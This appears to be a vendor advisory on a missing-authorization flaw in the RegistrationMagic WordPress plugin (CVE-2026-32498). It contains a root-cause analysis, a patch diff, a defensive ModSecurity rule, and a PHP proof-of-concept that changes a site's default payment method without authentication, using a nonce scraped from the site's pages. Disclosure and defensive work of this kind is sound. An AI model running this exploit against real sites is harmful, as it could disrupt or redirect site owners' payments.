What is CVE-2026-32498?

CVE-2026-32498 is a vulnerability in the RegistrationMagic plugin for WordPress, specifically versions up to and including 6.0.7.6. It is caused by a missing capability check that allows unauthenticated attackers to change the site’s default payment method through a vulnerable AJAX endpoint.

How does the vulnerability work?

The vulnerability allows attackers to send a POST request to the admin-ajax.php endpoint with a valid nonce. Since the function lacks proper authorization checks, any request with a valid nonce can modify the site’s default payment method without user authentication.

Who is affected by this vulnerability?

Any WordPress site using the RegistrationMagic plugin version 6.0.7.6 or earlier is affected. Site administrators should check their installed version against the patched version 6.0.7.7 to determine if they are at risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, review the version of the RegistrationMagic plugin installed on your WordPress site. If it is version 6.0.7.6 or earlier, your site is susceptible to this vulnerability.

How can I fix this vulnerability?

The vulnerability can be mitigated by updating the RegistrationMagic plugin to version 6.0.7.7 or later. This patched version includes additional capability checks that prevent unauthorized access to sensitive functions.

What does the CVSS score of 5.3 mean?

A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability does not allow for direct data exposure or remote code execution, it poses a risk of disrupting payment processing, which can have financial implications for the site.

What is a nonce and why is it important?

A nonce is a security token used in WordPress to verify that a request comes from a legitimate source. In this vulnerability, the nonce verification is insufficient on its own, as it does not check the user’s permissions, allowing unauthorized actions to be executed.

What could happen if this vulnerability is exploited?

If exploited, an attacker could change the site’s default payment method, potentially redirecting payments to unauthorized accounts or disabling payment functionalities altogether. This could disrupt legitimate transactions and lead to financial loss for the site owner.

How does the proof of concept demonstrate the issue?

The proof of concept shows how an attacker can use a valid nonce to send a request that changes the payment method without authentication. It illustrates the steps required to exploit the vulnerability, highlighting the lack of authorization checks in the vulnerable function.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the RegistrationMagic plugin until it can be updated. Additionally, review user permissions and restrict access to the admin-ajax.php endpoint to prevent unauthorized requests.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 30, 2026

CVE-2026-32498: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login <= 6.0.7.6 – Missing Authorization (custom-registration-form-builder-with-submission-manager)

CVE ID CVE-2026-32498

Plugin custom-registration-form-builder-with-submission-manager

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 6.0.7.6

Patched Version 6.0.7.7

Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-32498:
The RegistrationMagic WordPress plugin contains a missing authorization vulnerability in versions up to and including 6.0.7.6. This vulnerability allows unauthenticated attackers to change the site’s default payment method via an AJAX endpoint. The CVSS score of 5.3 reflects a medium severity impact.

Atomic Edge research identified the root cause in the `rm_options_default_payment_method` function within the `class_registration_magic.php` file. The function at line 1220 only verified the AJAX nonce via `check_ajax_referer(‘rm_ajax_secure’,’rm_sec_nonce’)` but lacked any capability check. This allowed any request with a valid nonce to proceed, regardless of the user’s authentication status or permissions. The nonce verification alone provided insufficient protection for administrative actions.

Exploitation requires sending a POST request to the WordPress admin-ajax.php endpoint with the action parameter set to `rm_options_default_payment_method`. The attacker must include a valid `rm_sec_nonce` value, which can be obtained from the frontend of any site using the plugin, and the `payment_method` parameter containing the new payment method value. Attackers can use this to disrupt payment processing or force specific payment gateways.

The patch adds a capability check to the existing nonce verification. The updated condition at line 1220 now requires `(current_user_can(‘manage_options’) || current_user_can(‘rm_options_managemanage_options’))`. This ensures only users with administrative privileges or specific RegistrationMagic management capabilities can execute the function. The plugin version was incremented to 6.0.7.7 in registration_magic.php.

Successful exploitation allows unauthenticated attackers to modify the site’s default payment method configuration. While this does not directly lead to data exposure or remote code execution, it can disrupt legitimate payment processing, potentially causing financial impact or service disruption. Attackers could force the use of specific payment gateways they control or disable payment functionality entirely.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/custom-registration-form-builder-with-submission-manager/includes/class_registration_magic.php
+++ b/custom-registration-form-builder-with-submission-manager/includes/class_registration_magic.php
@@ -1220,7 +1220,7 @@
         }
     }
     public function rm_options_default_payment_method(){
-        if(check_ajax_referer('rm_ajax_secure','rm_sec_nonce')) {
+        if(check_ajax_referer('rm_ajax_secure','rm_sec_nonce') && (current_user_can('manage_options') || current_user_can('rm_options_managemanage_options'))) {
             if(!empty($_REQUEST['payment_method'])) {
                 update_option('rm_option_default_payment_method',sanitize_text_field($_REQUEST['payment_method']));
             }
--- a/custom-registration-form-builder-with-submission-manager/includes/class_rm_email.php
+++ b/custom-registration-form-builder-with-submission-manager/includes/class_rm_email.php
@@ -133,11 +133,7 @@
     */
     public function from($from, $name = '', $replyto = true) {
         if (!empty($from)) {
-            if (empty($name)) {
-                $this->set_header('From', $from);
-            } else {
-                $this->set_header('From', sprintf('%s <%s>', $name, $from));
-            }
+            $this->set_header('From', $from);
             $this->from = $from;
             $this->from_name = $name;
             if($replyto) {
--- a/custom-registration-form-builder-with-submission-manager/public/class_rm_public.php
+++ b/custom-registration-form-builder-with-submission-manager/public/class_rm_public.php
@@ -334,9 +334,11 @@
         RM_DBManager::add_form_published_pages($form_id, get_the_ID());

         // Load new shortcode if form has rows
+        /*
         if (!empty(RM_DBManager::get_rows_by_form_id($form_id))) {
             return $this->rm_new_form_render($attribute);
         }
+        */

         $this->enqueue_styles();
         $this->enqueue_scripts();
--- a/custom-registration-form-builder-with-submission-manager/registration_magic.php
+++ b/custom-registration-form-builder-with-submission-manager/registration_magic.php
@@ -15,7 +15,7 @@
  * Plugin Name:       RegistrationMagic
  * Plugin URI:        http://www.registrationmagic.com
  * Description:       A powerful system for customizing registration forms, setting up paid registrations, tracking submissions, managing users, assigning user roles, analyzing stats, and much more!!
- * Version:           6.0.7.6
+ * Version:           6.0.7.7
  * Tags:              registration, form, custom, analytics, simple, submissions
  * Requires at least: 5.2.0
  * Requires PHP:      7.2
@@ -78,7 +78,7 @@
 */
 if(!defined('RM_PLUGIN_VERSION')) {
     define('RM_PLUGIN_BASENAME', plugin_basename(__FILE__ ));
-    define('RM_PLUGIN_VERSION', '6.0.7.6');
+    define('RM_PLUGIN_VERSION', '6.0.7.7');
     define('RM_DB_VERSION', 5.9);
     define('RM_SHOW_WHATSNEW_SPLASH', false);  //Set it to 'false' to disable whatsnew screen.
     //define FB SDK req flags. Flags should be combined using logical OR and should be checked using AND.
--- a/custom-registration-form-builder-with-submission-manager/services/class_rm_front_service.php
+++ b/custom-registration-form-builder-with-submission-manager/services/class_rm_front_service.php
@@ -166,7 +166,7 @@
         if (is_user_logged_in()) {
             $user = wp_get_current_user();
             $user_email = isset($user->user_email) ? $user->user_email : null;
-        } elseif (isset($_COOKIE['rm_autorized_email'])) {
+        } elseif (isset($_COOKIE['rm_autorized_email']) && $this->is_authorized()) {
             $user_email = $_COOKIE['rm_autorized_email'];
         }

--- a/custom-registration-form-builder-with-submission-manager/services/class_rm_services.php
+++ b/custom-registration-form-builder-with-submission-manager/services/class_rm_services.php
@@ -2326,12 +2326,12 @@
             }
         }

-        if($this->get_setting('auto_generated_password')!='yes'){
+        /* if($this->get_setting('auto_generated_password')!='yes'){
             $user_pas_field = RM_DBManager::get_field_by_type($form_id, 'UserPassword');
             if(empty($user_pas_field)){
               $this->create_default_password_field($form_id, $has_rows);
             }
-        }
+        } */
     }

     public function remove_primary_fields($form_id){

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-32498
# Block unauthorized access to RegistrationMagic default payment method AJAX endpoint
# This rule targets the exact vulnerable action that lacks authorization checks
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:10032498,phase:2,deny,status:403,chain,msg:'CVE-2026-32498 - Unauthorized RegistrationMagic payment method change',severity:'CRITICAL',tag:'CVE-2026-32498',tag:'WordPress',tag:'Plugin',tag:'RegistrationMagic'"
  SecRule ARGS_POST:action "@streq rm_options_default_payment_method" "chain"
    SecRule &ARGS_POST:rm_sec_nonce "!@eq 0" "chain"
      SecRule &ARGS_POST:payment_method "!@eq 0"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-32498 - RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login <= 6.0.7.6 - Missing Authorization

<?php
/**
 * Proof of Concept for CVE-2026-32498
 * This script demonstrates unauthorized default payment method change in RegistrationMagic plugin
 * Requires a valid nonce from the target site (can be extracted from frontend HTML)
 */

$target_url = 'https://example.com/wp-admin/admin-ajax.php'; // CHANGE THIS
$nonce = 'VALID_NONCE_HERE'; // Extract from page source: search for 'rm_sec_nonce'
$new_payment_method = 'paypal'; // Payment method to set

// Build the exploit payload
$post_data = array(
    'action' => 'rm_options_default_payment_method',
    'rm_sec_nonce' => $nonce,
    'payment_method' => $new_payment_method
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Add headers to mimic legitimate AJAX request
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'X-Requested-With: XMLHttpRequest',
    'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
));

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Analyze response
if ($http_code == 200 && strpos($response, 'success') !== false) {
    echo "[+] SUCCESS: Default payment method changed to '$new_payment_method'n";
    echo "Response: $responsen";
} else {
    echo "[-] FAILED: HTTP $http_coden";
    echo "Response: $responsen";
}

// Helper: How to extract nonce from target site
/*
1. Visit any page with RegistrationMagic forms
2. View page source (Ctrl+U)
3. Search for 'rm_sec_nonce' or 'rm_ajax_secure'
4. Extract the nonce value from the JavaScript variable
Example: var rm_ajax = {nonce: 'a1b2c3d4e5'};
*/
?>

Frequently Asked Questions

What is CVE-2026-32498?
Overview of the vulnerability
CVE-2026-32498 is a vulnerability in the RegistrationMagic plugin for WordPress, specifically versions up to and including 6.0.7.6. It is caused by a missing capability check that allows unauthenticated attackers to change the site’s default payment method through a vulnerable AJAX endpoint.
How does the vulnerability work?
Mechanics of the exploitation
The vulnerability allows attackers to send a POST request to the admin-ajax.php endpoint with a valid nonce. Since the function lacks proper authorization checks, any request with a valid nonce can modify the site’s default payment method without user authentication.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the RegistrationMagic plugin version 6.0.7.6 or earlier is affected. Site administrators should check their installed version against the patched version 6.0.7.7 to determine if they are at risk.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, review the version of the RegistrationMagic plugin installed on your WordPress site. If it is version 6.0.7.6 or earlier, your site is susceptible to this vulnerability.
How can I fix this vulnerability?
Updating the plugin
The vulnerability can be mitigated by updating the RegistrationMagic plugin to version 6.0.7.7 or later. This patched version includes additional capability checks that prevent unauthorized access to sensitive functions.
What does the CVSS score of 5.3 mean?
Understanding the severity level
A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability does not allow for direct data exposure or remote code execution, it poses a risk of disrupting payment processing, which can have financial implications for the site.
What is a nonce and why is it important?
Role of nonce in security
A nonce is a security token used in WordPress to verify that a request comes from a legitimate source. In this vulnerability, the nonce verification is insufficient on its own, as it does not check the user’s permissions, allowing unauthorized actions to be executed.
What could happen if this vulnerability is exploited?
Potential consequences of exploitation
If exploited, an attacker could change the site’s default payment method, potentially redirecting payments to unauthorized accounts or disabling payment functionalities altogether. This could disrupt legitimate transactions and lead to financial loss for the site owner.
How does the proof of concept demonstrate the issue?
Understanding the provided exploit
The proof of concept shows how an attacker can use a valid nonce to send a request that changes the payment method without authentication. It illustrates the steps required to exploit the vulnerability, highlighting the lack of authorization checks in the vulnerable function.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider disabling the RegistrationMagic plugin until it can be updated. Additionally, review user permissions and restrict access to the admin-ajax.php endpoint to prevent unauthorized requests.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations